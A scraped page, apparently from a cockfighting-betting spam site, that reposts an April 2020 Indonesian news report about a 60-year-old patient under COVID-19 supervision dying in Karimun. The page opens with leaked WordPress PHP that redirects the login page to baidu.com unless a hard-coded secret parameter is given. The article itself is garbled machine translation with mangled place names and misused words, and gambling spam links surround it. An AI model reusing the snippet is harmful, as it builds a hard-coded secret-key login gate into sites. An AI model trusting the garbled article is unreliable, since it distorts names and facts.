//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } PDP Karimun Kepri meninggal setelah dirawat di rumah sakit semalam di Rumah Sakit Distrik Muhammad Sani | adu ayam bali_s128.net login_s128.live

PDP Karimun Kepri meninggal setelah dirawat di rumah sakit semalam di Rumah Sakit Distrik Muhammad Sani

Kota Carrimon TRIBUNNEWS.COM – Pasien lain (PDP) di bawah pengawasan di Carrimon (Kepulauan Rioine) Kabupaten Kepulauan Riau meninggal.

Oleh karena itu, jumlah total PDP yang terbunuh di Kabupaten Karimun adalah 2.

PDP mati pertama adalah seorang pria dari Pulau Kundur, yang baru-baru ini diumumkan sebagai Covid-19 negatif.

Ketika PDP kedua masih menunggu hasil tes swab dikirim ke BTKL-PP Batam oleh Kelompok Kerja Manajemen Akselerasi Covid-19.

Direktur Kantor Administrasi Kesehatan Distrik Karimun, Rachmadi mengatakan bahwa PDP adalah pria berusia 60 tahun dari Pulau Kundur.

Baca: Polisi masih menyelidiki keluarga Purwakarta yang ditikam

“Ya, PDP meninggal kemarin (16/4/2020). Kami sedang menunggu hasil dari penyeka,” Rachmadi (Rachmadi) ) Katanya, Selasa (21/4/2020).

Pria itu telah menerima satu malam perawatan di Rumah Sakit Umum Kabupaten Mohammed Sani Carrimon. Memasuki malam, dia meninggal keesokan paginya. “Kata Rahmadi. Pasien diidentifikasi sebagai PDP karena gejala pneumonia.” “Kami telah mengirim swab, berharap hasil Covid-19 negatif,” harap Rachmadi .. (tribunbatam.id/Elhadif Putra)

Artikel ini dipublikasikan di tribunbatam.id, berjudul: Waktu untuk bermalam di rumah sakit, seorang PDP dari Karimun meninggal

Leave a comment

adu ayam bali_s128.net login_s128.live